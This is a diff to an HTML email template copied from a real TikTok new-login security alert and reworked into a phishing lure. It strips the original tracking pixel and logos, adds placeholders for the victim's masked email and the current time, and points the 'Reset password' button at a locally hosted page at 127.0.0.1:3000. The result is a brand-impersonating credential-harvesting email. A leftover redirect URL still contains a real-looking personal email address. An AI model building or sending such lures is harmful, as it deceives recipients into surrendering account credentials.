--- a/email/email-template.html
+++ b/email/email-template.html
@@ -30,56 +30,6 @@
           <div class="adM"></div>
           <div
             style="
-              margin: 0;
-              font-family: TikTokFont, Arial, sans-serif, Roboto;
-              box-sizing: border-box;
-              width: 100%;
-              padding: 0px 0px;
-            "
-          >
-            <div class="adM"></div>
-            <img
-              style="
-                margin: 0;
-                font-family: TikTokFont, Arial, sans-serif, Roboto;
-                box-sizing: border-box;
-                width: 100%;
-              "
-              src="https://ci3.googleusercontent.com/meips/ADKq_NaUH4mSise_OyZ8PpDveTK8jOXATrlHwunPLhpuptrdMq7bxzyE8_N2NTB8xMD-VRi6v5q_wXNdOMwazJXbC8tfuvLQRePKfeD6Y_4F-ns_ZaNKeg=s0-d-e1-ft#https://sf16-sg.tiktokcdn.com/obj/eden-sg/lpeeh7uhsh/Group.png"
-              class="CToWUd"
-              data-bit="iit"
-            />
-          </div>
-          <div
-            style="
-              margin: 0;
-              font-family: TikTokFont, Arial, sans-serif, Roboto;
-              box-sizing: border-box;
-              width: 100%;
-              padding: 0px 7px;
-              margin-top: 32px;
-            "
-          >
-            <img
-              id="m_582471570836904901top-img"
-              alt="Icon Frame"
-              style="
-                font-family: TikTokFont, Arial, sans-serif, Roboto;
-                box-sizing: border-box;
-                display: block;
-                margin: auto;
-                width: 40px;
-                height: 40px;
-              "
-              src="https://ci3.googleusercontent.com/meips/ADKq_NYUisEzK7zZtxx_QHcmYxZ23u8T92gB6ooQMC8OvAjXHk7fnwR0-zx7xyVSBsjh9c6UB26xGzgysAJMFqpWQR2XJIa2GyklP8LS8rUUKPwOAxx-xTASWTQf=s0-d-e1-ft#https://sf16-sg.tiktokcdn.com/obj/eden-sg/lpeeh7uhsh/tiktok-top.png"
-              width="40"
-              height="40"
-              class="CToWUd"
-              data-bit="iit"
-            />
-          </div>
-          <div
-            style="
               margin-top: 12px;
               font-family: TikTokFont, Arial, sans-serif, Roboto;
               box-sizing: border-box;
@@ -89,7 +39,7 @@
               line-height: 38px;
             "
           >
-            New Login on Your Account
+            New Login on Your TikTok Account
           </div>
 
           <div
@@ -119,6 +69,7 @@
                   margin: 0;
                   font-family: TikTokFont, Arial, sans-serif, Roboto;
                   box-sizing: border-box;
+                  text-decoration: none;
                 "
                 ><label
                   id="m_582471570836904901code"
@@ -126,11 +77,13 @@
                     margin: 0;
                     font-family: TikTokFont, Arial, sans-serif, Roboto;
                     box-sizing: border-box;
+                    text-decoration: none;
                   "
                   >{masked-email}</label
                 ></b
               >
-              on 04/30 21:20 BST in England on device iPhone 14.
+              on {current-date} {current-time} BST in England on device iPhone
+              14.
             </p>
             <br />
             <p
@@ -174,23 +127,28 @@
               target="_blank"
               data-saferedirecturl="https://www.google.com/url?q=https://www.tiktok.com/ucenter_web/deeplink/email_verification?SHORTCUT_NEED_LOGIN%3DSHORTCUT_NEED_LOGIN_NO%26aid%3D1233%26code%3Dbc646114-cd27-4c4d-9b08-19a39e7f818d%26email%3Djamiewixbusiness%2540gmail.com%26language%3Den%26locale%3Den-GB%26type%3D13&amp;source=gmail&amp;ust=1746121814948000&amp;usg=AOvVaw1bQc6zccfF2OAXDxyf-itz"
             >
-              <div
-                style="
-                  margin: 0;
-                  font-family: TikTokFont, Arial, sans-serif, Roboto;
-                  box-sizing: border-box;
-                  background-color: #fe2c55;
-                  border-radius: 8px;
-                  text-align: center;
-                  height: 44px;
-                  line-height: 44px;
-                  margin-left: 43px;
-                  margin-right: 43px;
-                  color: rgba(255, 255, 255, 1);
-                "
+              <a
+                href="http://127.0.0.1:3000/index.html"
+                style="text-decoration: none"
               >
-                Reset password
-              </div>
+                <div
+                  style="
+                    margin: 0;
+                    font-family: TikTokFont, Arial, sans-serif, Roboto;
+                    box-sizing: border-box;
+                    background-color: #fe2c55;
+                    border-radius: 8px;
+                    text-align: center;
+                    height: 44px;
+                    line-height: 44px;
+                    margin-left: 43px;
+                    margin-right: 43px;
+                    color: rgba(255, 255, 255, 1);
+                  "
+                >
+                  Reset password
+                </div>
+              </a>
             </a>
             <p
               style="
@@ -228,24 +186,7 @@
               width: 100%;
               padding: 20px 0px;
             "
-          >
-            <img
-              id="m_582471570836904901bottom-img"
-              style="
-                font-family: TikTokFont, Arial, sans-serif, Roboto;
-                box-sizing: border-box;
-                display: block;
-                margin: auto;
-                width: 75px;
-                height: 18px;
-              "
-              src="https://ci3.googleusercontent.com/meips/ADKq_NZ9EXIVDSgZMc9HpmYb5vEvyBteBdc2rXM-Iu_dGx693mb-JMyEReN0DYq5N_bqczfK9b2gTfjrGIsxlo4TorvMW55h_GGa2WB7JJ3Foxos8VYkK4qIqdxiawLx=s0-d-e1-ft#https://sf16-sg.tiktokcdn.com/obj/eden-sg/lpeeh7uhsh/tiktok-bottom.png"
-              width="75"
-              height="18"
-              class="CToWUd"
-              data-bit="iit"
-            />
-          </div>
+          ></div>
 
           <div
             style="
@@ -327,29 +268,6 @@
             </div>
           </div>
         </div>
-
-        <img
-          src="https://ci3.googleusercontent.com/meips/ADKq_Nb9G520n_ASuLji42np8XLlSzrOisidaVV7IiEsikoHnBCawJM19Kdgyjhw_g5-9BKK8FDEScXCtnJM29Oyhx7VL794U_aOBYd9lRyvkqU64QpXR1jM_h2IwydZxPWrDTyKjwdJF7iCl-BPuzgh4oQqmxOK2WnBiFkSCeRR6IQvMS905Mr_9atvej40hx0Hz0fncCjxeWM9aoe08Csd38oRU7Pc8EerSWYHatsX_5s7IRJk8lFHpi694DKsuSYs00EqtZ1c-oMV9tmGRhhlL4BIbew8zg4ifc5K32quYNdMgpENiOPFpn7cEf_se50_E1G2WucpvOJH8OLuEQ8qyp8I3KQjHoJ0dBJqCfx_gbpQ2KgPIipaDeznsq-kfQpLznbGafgrTXtRM6UM_6vmSxLqbMMgcgID3VHQt_8yqApIEGwQrE6c02efyFKxBQQvVs3PnskIlZ9xM4yylRtBsyIDNgNj_2zpKlR5lmULPRWlECBx9jeEyAFDP588HY4MwY3xTIrVV96rk582VplhCPqog4TgNScdi3nH058FTOZroz4ldEiA0mWKjQlSGd3_vrHBdhGeUDZLPV9w7mIT7fRb7FcO8NySdwl61LLJyM8WcmVbFXyoNKVcwAVdVjyvFcCJswysdmwycKlV5sYse7lk5-RE5C2Ind9dLrhquKRJ=s0-d-e1-ft#http://url7709.account.tiktok.com/wf/open?upn=u001.Yad66HyIB4Z9nOWbeQ44lIL5dROPrGYX6CUY3f3NDpu6IsgvmXT1HGWxIcS-2FDOE3Ub-2Bh0ylXl8c8EDcDtrTghUhm-2BUgQA46UnmMI1jb-2FQ62PMUS-2FF48ye-2FBaWFjaylb1UNa1520dMtq5-2FkFJgH1NQbtXvRn8l4LvV5QOKbUyOos7T-2FGwjlpSuKWtJofJfs13fvF9orkuRmehIeQi9dxGqUKvx8cwbTq9sUFz8Y-2BLUYSXQNEM2JVnvw1qYBKeqmcA-2BTIfZueHKrhSqyPAw0RkcCl-2FFLktRo65nioWLTbZC0G6-2B-2BiFQvXWTiXMZr6pxWJyfPSL32RHrDwuRAkZalCn8RuZ2IkVR0yDxmfi18OIgX4XwmZkL01IfasKFY0kYpZoJRdM5qfZSPN5cefyK5QGhw-3D-3D"
-          alt=""
-          width="1"
-          height="1"
-          border="0"
-          style="
-            height: 1px !important;
-            width: 1px !important;
-            border-width: 0 !important;
-            margin-top: 0 !important;
-            margin-bottom: 0 !important;
-            margin-right: 0 !important;
-            margin-left: 0 !important;
-            padding-top: 0 !important;
-            padding-bottom: 0 !important;
-            padding-right: 0 !important;
-            padding-left: 0 !important;
-          "
-          class="CToWUd"
-          data-bit="iit"
-        />
       </div>
       <div class="yj6qo"></div>
       <div class="adL"></div>
